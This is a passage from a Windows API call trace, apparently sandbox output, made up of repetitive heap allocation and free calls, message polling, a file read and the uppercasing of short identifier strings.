lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0261.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0261.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.315] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0261.315] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d820 | out: hHeap=0x25c0000) returned 1 [0261.315] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.315] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.315] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.316] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0261.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.318] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0261.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0261.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0261.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.319] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.319] SetFilePointerEx (in: hFile=0x294, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8bf4ec | out: lpNewFilePointer=0x0) returned 1 [0261.319] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0xfecf, lpOverlapped=0x0) returned 1 [0261.381] ReadFile (in: hFile=0x294, lpBuffer=0x3551008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8bf500, lpOverlapped=0x0 | out: lpBuffer=0x3551008*, lpNumberOfBytesRead=0x8bf500*=0x0, lpOverlapped=0x0) returned 1 [0261.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9c18 | out: hHeap=0x25c0000) returned 1 [0261.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.381] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9a68 | out: hHeap=0x25c0000) returned 1 [0261.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x36b0020 | out: hHeap=0x25c0000) returned 1 [0261.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa230 | out: hHeap=0x25c0000) returned 1 [0261.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa038 | out: hHeap=0x25c0000) returned 1 [0261.382] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9678 | out: hHeap=0x25c0000) returned 1 [0261.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0261.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ba8 | out: hHeap=0x25c0000) returned 1 [0261.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.383] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0261.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.386] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0261.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b7a48 | out: hHeap=0x25c0000) returned 1 [0261.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24acde0 | out: hHeap=0x25c0000) returned 1 [0261.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa7e8 | out: hHeap=0x25c0000) returned 1 [0261.386] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.386] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0261.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0261.387] PeekMessageW (in: lpMsg=0x8bf710, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf710) returned 0 [0261.387] CharUpperBuffW (in: lpsz="A6000504F44", cchLength=0xb | out: lpsz="A6000504F44") returned 0xb [0261.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c88 | out: hHeap=0x25c0000) returned 1 [0261.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0261.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa7e8 [0261.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2bb8 [0261.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24acde0 [0261.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9678 [0261.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18d8 [0261.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0261.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xfecf) returned 0x24b7a48 [0261.387] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18d8 | out: hHeap=0x25c0000) returned 1 [0261.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b18d8 [0261.387] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa038 [0261.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2da8 [0261.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0261.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2da8 [0261.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa230 [0261.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2c18 [0261.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2c18 | out: hHeap=0x25c0000) returned 1 [0261.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x1) returned 0x24b2c18 [0261.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0261.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1838 [0261.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1838 | out: hHeap=0x25c0000) returned 1 [0261.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9c18 [0261.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0261.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1838 [0261.388] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1a0 | out: hHeap=0x25c0000) returned 1 [0261.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3bc8 [0261.388] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1a0 [0261.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18e8 [0261.389] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xfecf) returned 0x24d77f8 [0261.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b70 [0261.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0261.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9f78 | out: hHeap=0x25c0000) returned 1 [0261.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b56a8 [0261.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f78 [0261.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c10 [0261.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0261.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1868 [0261.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9ed0 | out: hHeap=0x25c0000) returned 1 [0261.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6bc0 [0261.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0261.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b64e0 [0261.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.390] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1848 [0261.390] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0261.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c38 [0261.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aca50 [0261.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8a0 [0261.391] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18b8 [0261.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1438 [0261.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0261.391] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.391] CharUpperBuffW (in: lpsz="SSA6000504F44", cchLength=0xd | out: lpsz="SSA6000504F44") returned 0xd [0261.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1438 | out: hHeap=0x25c0000) returned 1 [0261.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9420 | out: hHeap=0x25c0000) returned 1 [0261.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.391] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18b8 | out: hHeap=0x25c0000) returned 1 [0261.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8e0 [0261.392] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0261.392] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9420 [0261.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18b8 [0261.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0261.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0261.392] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0261.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0261.392] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0261.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e10 [0261.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.393] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa248 [0261.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2088 [0261.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b20 [0261.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0261.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa9b0 | out: hHeap=0x25c0000) returned 1 [0261.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0261.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0261.393] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0261.393] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.394] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9f60 [0261.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0261.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3b50 [0261.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.394] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0261.394] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa020 | out: hHeap=0x25c0000) returned 1 [0261.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0261.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa020 [0261.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9708 [0261.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.395] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0261.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x249bb10 [0261.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6d00 [0261.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0261.395] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0261.395] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0261.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0261.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ee8 [0261.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.396] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e70 [0261.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa8a8 [0261.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2060 [0261.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6508 [0261.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2070 [0261.396] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0261.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6b48 [0261.396] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aaec0 [0261.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa128 [0261.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e70 | out: hHeap=0x25c0000) returned 1 [0261.397] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0261.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2058 [0261.397] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0261.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3c90 | out: hHeap=0x25c0000) returned 1 [0261.397] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0261.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x24a9e70 [0261.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0261.397] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0261.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0261.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2080 [0261.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9d20 [0261.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa158 [0261.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x34a2090 [0261.397] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa878 [0261.398] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0261.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x34a2090 [0261.398] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c90 [0261.398] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 